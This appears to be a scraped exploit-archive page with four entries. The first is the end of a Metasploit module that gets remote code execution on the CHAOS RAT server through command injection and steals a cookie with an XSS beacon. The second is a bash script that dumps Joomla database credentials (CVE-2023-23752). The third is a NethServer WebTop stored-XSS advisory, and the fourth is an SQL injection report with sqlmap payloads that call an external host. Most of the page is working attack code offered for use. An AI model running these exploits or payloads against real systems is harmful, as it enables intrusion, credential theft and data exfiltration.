7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running<br /> in a docker container.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'chebuya' # original PoC, analysis<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc'],<br /> [ 'URL', 'https://github.com/tiagorlampert/CHAOS'],<br /> [ 'CVE', '2024-31839'], # XSS<br /> [ 'CVE', '2024-30850'] # RCE<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Privileged' => false,<br /> 'Payload' => { 'BadChars' => ' ' },<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 3_600, # 1hr<br /> 'URIPATH' => '/' # avoid long URLs in xss payloads<br /> },<br /> 'DisclosureDate' => '2024-04-10',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('USERNAME', [ false, 'User to login with']), # admin<br /> OptString.new('PASSWORD', [ false, 'Password to login with']), # admin<br /> OptString.new('TARGETURI', [ true, 'The URI of the Chaos Application', '/']),<br /> OptString.new('JWT', [ false, 'Agent JWT Token of the malware']),<br /> OptPath.new('AGENT', [ false, 'A Chaos Agent Binary'])<br /> ]<br /> )<br /> register_advanced_options(<br /> [<br /> OptString.new('AGENT_HOSTNAME', [ false, 'Hostname for a fake agent', 'DC01']),<br /> OptString.new('AGENT_USERNAME', [ false, 'Username for a fake agent', 'Administrator']),<br /> OptString.new('AGENT_USERID', [ false, 'User ID for a fake agent', 'Administrator']),<br /> OptEnum.new('AGENT_OS', [ false, 'OS for a fake agent', 'Windows', ['Windows', 'Linux']]),<br /> ]<br /> )<br /> end<br /><br /> def on_request_uri(cli, request)<br /> if request.method == 'GET' && @xss_response_received == false<br /> vprint_status('Received GET request.')<br /> return unless request.uri.include? '='<br /><br /> cookie = request.uri.split('jwt=')[1]<br /> print_good("Received cookie: #{cookie}")<br /> send_response_html(cli, '')<br /> @xss_response_received = true<br /> list_agents(cookie)<br /> rce(cookie)<br /> end<br /> send_response_html(cli, '')<br /> end<br /><br /> def mac_address<br /> @mac_address ||= Faker::Internet.mac_address<br /> @mac_address<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /><br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200<br /><br /> return CheckCode::Detected('Chaos application found') if res.body.include?('<title>CHAOS</title>')<br /><br /> CheckCode::Safe('Chaos application not found')<br /> end<br /><br /> def login<br /> vprint_status('Attempting login')<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'auth'),<br /> 'vars_post' => {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD']<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200<br /> res.get_cookies.scan(/jwt=([\w._-]+);*/).flatten[0] || ''<br /> end<br /><br /> def rce(cookie)<br /> data = Rex::MIME::Message.new<br /><br /> data.add_part("http://localhost\'$(#{payload.encoded})\'", nil, nil, 'form-data; name="address"')<br /> data.add_part('8080', nil, nil, 'form-data; name="port"')<br /> data.add_part('1', nil, nil, 'form-data; name="os_target"') # 1 windows, 2 linux<br /> data.add_part('', nil, nil, 'form-data; name="filename"')<br /> data.add_part('false', nil, nil, 'form-data; name="run_hidden"')<br /><br /> post_data = data.to_s<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'generate'),<br /> 'ctype' => "multipart/form-data; boundary=#{data.bound}",<br /> 'data' => post_data,<br /> 'cookie' => "jwt=#{cookie}"<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Shellcode rejected: #{res.body}") unless res.code == 200<br /> end<br /><br /> def convert_to_int_array(string)<br /> string.bytes.to_a<br /> end<br /><br /> # Retrieve the server's response and pull out the command response. The return value is<br /> # the server's response value (or 1 on failure).<br /> def recv_wsframe_status(wsock)<br /> res = wsock.get_wsframe<br /> return 1 unless res<br /><br /> begin<br /> res_json = JSON.parse(res.payload_data)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response.')<br /> end<br /> command = res_json['command']<br /> return 1 if command.nil?<br /><br /> command<br /> end<br /><br /> def agent_command_handler(cookie)<br /> vprint_status('WebSocket connecting to receive commands')<br /> headers = {<br /> 'Cookie' => "jwt=#{cookie}",<br /> 'X-Client' => mac_address<br /> }<br /><br /> wsock = connect_ws(<br /> 'uri' => normalize_uri(target_uri.path, 'client'),<br /> 'headers' => headers<br /> )<br /><br /> start_time = Time.now.to_i<br /> command = 1<br /> while Time.now.to_i < start_time + datastore['WfsDelay']<br /> begin<br /> Timeout.timeout(datastore['WfsDelay']) do<br /> command = recv_wsframe_status(wsock)<br /> end<br /> rescue Timeout::Error<br /> command = 1<br /> end<br /><br /> next if command == 1<br /><br /> vprint_good("Received agent command '#{command}', sending XSS in return")<br /><br /> data = {<br /> 'client_id' => mac_address,<br /> # removed the rickroll from the PoC :(<br /> 'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),<br /> 'has_error' => false<br /> }<br /> wsock.put_wsbinary(JSON.generate(data))<br /> end<br /> print_status('Stopping WebSocket connection')<br /> end<br /><br /> def agent_callback_checkin(cookie)<br /> start_time = Time.now.to_i<br /> while Time.now.to_i < start_time + datastore['WfsDelay']<br /> print_status('Performing Callback Checkin')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'health'),<br /> 'cookie' => "jwt=#{cookie}"<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Checkin rejected: #{res.code}") unless res.code == 200<br /><br /> body = {<br /> hostname: datastore['AGENT_HOSTNAME'],<br /> username: datastore['AGENT_USERNAME'],<br /> user_id: datastore['AGENT_USERID'],<br /> os_name: datastore['AGENT_OS'],<br /> os_arch: 'amd64',<br /> mac_address: mac_address,<br /> local_ip_address: datastore['SRVHOST'],<br /> port: datastore['SRVPORT'].to_s,<br /> fetched_unix: Time.now.to_i<br /> }<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'device'),<br /> 'cookie' => "jwt=#{cookie}",<br /> 'data' => body.to_json<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Checkin rejected: #{res.code}") unless res.code == 200<br /> Rex.sleep(30)<br /> end<br /> print_status('Stopping Callback Checkin')<br /> end<br /><br /> def fake_agent(server_cookie)<br /> # start callback checkins and command handler<br /> @threads = []<br /> @threads << framework.threads.spawn('CHAOS-agent-callback', false) do<br /> agent_callback_checkin(server_cookie)<br /> end<br /> @threads << framework.threads.spawn('CHAOS-agent-command-handler', false) do<br /> agent_command_handler(server_cookie)<br /> end<br /> @threads.map do |t|<br /> t.join<br /> rescue StandardError => e<br /> print_error("Error in CHAOS Rat Threads: #{e}")<br /> end<br /> end<br /><br /> #<br /> # Handle the HTTP request and return a response. Code borrowed from:<br /> # msf/core/exploit/http/server.rb<br /> #<br /> def start_http_service(opts = {})<br /> # Start a new HTTP server<br /> @http_service = Rex::ServiceManager.start(<br /> Rex::Proto::Http::Server,<br /> (opts['ServerPort'] || bindport).to_i,<br /> opts['ServerHost'] || bindhost,<br /> datastore['SSL'],<br /> {<br /> 'Msf' => framework,<br /> 'MsfExploit' => self<br /> },<br /> opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),<br /> datastore['SSLCert'],<br /> datastore['SSLCompression'],<br /> datastore['SSLCipher'],<br /> datastore['SSLVersion']<br /> )<br /> @http_service.server_name = datastore['HTTP::server_name']<br /> # Default the procedure of the URI to on_request_uri if one isn't<br /> # provided.<br /> uopts = {<br /> 'Proc' => method(:on_request_uri),<br /> 'Path' => resource_uri<br /> }.update(opts['Uri'] || {})<br /> proto = (datastore['SSL'] ? 'https' : 'http')<br /><br /> netloc = opts['ServerHost'] || bindhost<br /> http_srvport = (opts['ServerPort'] || bindport).to_i<br /> if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)<br /> if Rex::Socket.is_ipv6?(netloc)<br /> netloc = "[#{netloc}]:#{http_srvport}"<br /> else<br /> netloc = "#{netloc}:#{http_srvport}"<br /> end<br /> end<br /> print_status("Listening for XSS response on: #{proto}://#{netloc}#{uopts['Path']}")<br /><br /> # Add path to resource<br /> @service_path = uopts['Path']<br /> @http_service.add_resource(uopts['Path'], uopts)<br /> end<br /><br /> def list_agents(cookie)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'devices'),<br /> 'headers' => {<br /> 'cookie' => "jwt=#{cookie}"<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> soup = Nokogiri::HTML(res.body)<br /> rows = soup.css('tr')<br /><br /> agent_table = Rex::Text::Table.new(<br /> 'Header' => 'Live Agents',<br /> 'Indent' => 1,<br /> 'Columns' =><br /> [<br /> 'IP',<br /> 'OS',<br /> 'Username',<br /> 'Hostname',<br /> 'MAC'<br /> ]<br /> )<br /><br /> rows.each do |row|<br /> cells = row.css('td')<br /> next if cells.length != 7<br /><br /> agent_ip = cells[4].text.strip<br /> hostname = cells[1].text.strip<br /><br /> agent_table << [agent_ip, cells[3].text.strip, cells[2].text.strip, hostname, cells[5].text.strip]<br /> report_host(host: agent_ip, name: hostname, os_name: cells[3].text.strip, info: "CHAOS C2 Agent Deployed, callback: #{datastore['RHOST']}")<br /> end<br /> print_good('Detected Agents')<br /> print_line(agent_table.to_s)<br /> end<br /><br /> def exploit<br /> unless (datastore['USERNAME'] && datastore['PASSWORD']) ||<br /> datastore['JWT'] ||<br /> datastore['AGENT']<br /> fail_with(Failure::BadConfig, 'Username and password, or JWT, or AGENT path required')<br /> end<br /> fail_with(Failure::BadConfig, 'SRVHOST can not be 0.0.0.0, must be a valid IP address') if Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0<br /><br /> @xss_response_received = false<br /><br /> if datastore['USERNAME'] && datastore['PASSWORD']<br /> print_status('Attempting exploitation through direct login')<br /> cookie = login<br /> rce(cookie)<br /> elsif datastore['JWT']<br /> print_status('Attempting exploitation through JWT token')<br /> vprint_status("Fake MAC for agent: #{mac_address}")<br /> start_http_service<br /> fake_agent(datastore['JWT'])<br /> elsif datastore['AGENT']<br /> print_status('Attempting exploitation through Agent')<br /> fail_with(Failure::BadConfig, 'AGENT file not found') unless File.file?(datastore['AGENT'])<br /> agent_exe = File.read(datastore['AGENT'])<br /> if agent_exe =~ /main\.ServerAddress=(((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})/<br /> server_address = ::Regexp.last_match(1)<br /> vprint_status("Server address: #{server_address}")<br /> end<br /><br /> if agent_exe =~ /main\.Port=(\d{1,6})/<br /> server_port = ::Regexp.last_match(1)<br /> vprint_status("Server port: #{server_port}")<br /> end<br /><br /> if agent_exe =~ %r{main\.Token=([a-zA-Z0-9_.\-+/=]*\.[a-zA-Z0-9_.\-+/=]*\.[a-zA-Z0-9_.\-+/=]*)}<br /> server_cookie = ::Regexp.last_match(1)<br /> vprint_status("Server JWT Token: #{server_cookie}")<br /> end<br /> fail_with(Failure::BadConfig, 'JWT token not found in agent executable') unless server_cookie<br /> vprint_status("Fake MAC for agent: #{mac_address}")<br /> start_http_service<br /> fake_agent(server_cookie)<br /> end<br /> end<br /><br /> def cleanup<br /> # Clean and stop HTTP server<br /> if @http_service<br /> begin<br /> @http_service.remove_resource(datastore['URIPATH'])<br /> @http_service.deref<br /> @http_service.stop<br /> @http_service = nil<br /> rescue StandardError => e<br /> print_error("Failed to stop http server due to #{e}")<br /> end<br /> end<br /> @threads.each(&:kill) unless @threads.nil? # no need for these anymore<br /> super<br /> end<br />end<br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure<br /><br /># Date: 2024-05-21<br /># CVE: CVE-2023-23752<br /># Exploit Author: Miguel Redondo (aka d4t4s3c)<br /># Vendor Homepage: https://www.joomla.org<br /># Software Link: https://downloads.joomla.org<br /># Version: <= 4.2.8<br /># Tested on: Linux<br /># Category: Web Application<br /><br />while getopts ":u:" arg; do<br /> case ${arg} in<br /> u) url=${OPTARG}; let parameter_counter+=1 ;;<br /> esac<br />done<br /><br />if [ -z "${url}" ]; then<br /> echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"<br /> echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"<br /> exit 1<br />else<br /> echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"<br /> curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp<br /> echo -e "\n[i] Database info:\n"<br /> echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"<br /> echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"<br /> echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"<br /> echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"<br /> exit 0<br />fi<br /></code></pre>
<pre><code>CVE-2024-34058: Nethserver 7 & 8 stored cross-site scripting (XSS) in WebTop package<br /><br />[Suggested description]<br />The WebTop package for NethServer 7 and 8 allows stored XSS (for example, via the Subject field if an e-mail message).<br /><br />------------------------------------------<br /><br />[Additional Information]<br />NethServer module installed as WebTop, produced by Sonicle, is affected by a stored cross-site scripting (XSS) vulnerability due to insufficient input sanitization and output escaping which allows an attacker to store a malicious payload as to execute arbitrary web scripts or HTML.<br /><br />If malicious payload code is inserted within the subject field (as an example) of an email, it will be executed once the page is loaded through its frontend.<br /><br />Keep in extreme consideration and urgency that this vulnerability reside in the security-oriented server (and firewalling) distribution called NethServer.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Cross Site Scripting (XSS)<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />Nethesis / Sonicle<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />NethServer - 7<br />NethServer - 8<br /><br />------------------------------------------<br /><br />[Affected Component]<br />Affected component: its mail/webmail module<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Code execution]<br />true<br /><br />------------------------------------------<br /><br />[Impact Denial of Service]<br />true<br /><br />------------------------------------------<br /><br />[Impact Escalation of Privileges]<br />true<br /><br />------------------------------------------<br /><br />[Impact Information Disclosure]<br />true<br /><br />------------------------------------------<br /><br />[Attack Vectors]<br />Malicious payload inserted within (in example) the subject field of an email will be executed once the page is loaded.<br /><br />------------------------------------------<br /><br />[Reference]<br />https://www.nethserver.org<br />https://github.com/NethServer/webtop5<br />https://github.com/NethServer/ns8-webtop<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Intilangelo Andrea<br /><br />Use CVE-2024-34058.<br /><br />Additional info:<br /><br />NethServer is an Open Source operating system for the Linux enthusiast, designed for small offices and medium enterprises. From their website: "It's simple, secure and flexible" and "ready to deliver your messages, to protect your network with the built-in firewall, share your files and much more, everything on the same system."<br /><br />Unauthenticated stored XSS vulnerability due not adequately sanitized input or escaped output for email subject exists in the provided Groupware, a collaboration suite of services accessible via web through any HTML5 browser, smartphone or tablet.<br />It can be leveraged for a nearly zero-click attack.<br /><br />CVSS score: tbd* (but "High")<br />CVSS vector: tbd*<br />CWE: CWE-79<br /><br />*Needs to be calculated, taking into consideration the initial partial base string "CVSS:3.1/AV:N/AC:L/PR:N" since the Privileges Required of who send the mail with the payload is none as well as User Interaction (who is receiving the mail, just visualizing it could trigger the payload - like, for example, to grab session cookie) despite arguable by someone, Scope and C/I/A (surely from Low to High) must be contextualized from the perspective of the application, what it is used for, contains/impacts and is connected to it: indeed, being a sensitive component "through a modern user interface and a single authentication, it allows access to company mail, calendars, contacts, tasks, documents and much more, in a shared and secure platform" (quoting the product description), that means any kind of highly confidential information, even connected cloud instance (also outside the private network) and mobile devices synchronization.<br /><br />https://www.cve.org/CVERecord?id=CVE-2024-34058<br /><br />Discovered and reported by Andrea Intilangelo<br /><br /><br />Timeline:<br /><br />2024-01-03: Vulnerability discovered, kept as private 0day for further verification<br />2024-01-16: Request for CVE reservation & Multi-Party vulnerability coordination and disclosure<br />2024-04-23: Contacts with vendor for: details, acknowledgments and to coordinate the responsible disclosure<br />2024-04-30: Assigned CVE number: CVE-2024-34058<br />2024-05-06: Vendor agreed to the proposed responsible disclosure date (May 17)<br />2024-05-10: Shared a PoC requested by the vendor showing the vulnerability<br />2024-05-17: Disclosure<br /></code></pre>
<pre><code>## Titles: TENANT-LIMITED-1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05/20/2024<br />## Vendor: https://mayurik.com/<br />## Software:<br />https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+' was submitted<br />in the username parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=nlWcgulD'+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' OR NOT<br />7856=7856 OR 'qylg'='WmKA&password=q7L!w3j!P7<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: username=nlWcgulD'+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' AND (SELECT<br />5737 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT<br />(ELT(5737=5737,1))),0x7171786b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'bruW'='pbdw&password=q7L!w3j!P7<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=nlWcgulD'+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' AND (SELECT<br />4762 FROM (SELECT(SLEEP(7)))iyAW) OR 'ryQj'='epQU&password=q7L!w3j!P7<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/tenant-limited-1-104585030)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/05/tenant-limited-10-sqli.html)<br /><br />## Time spent:<br />00:39:00<br /><br /></code></pre>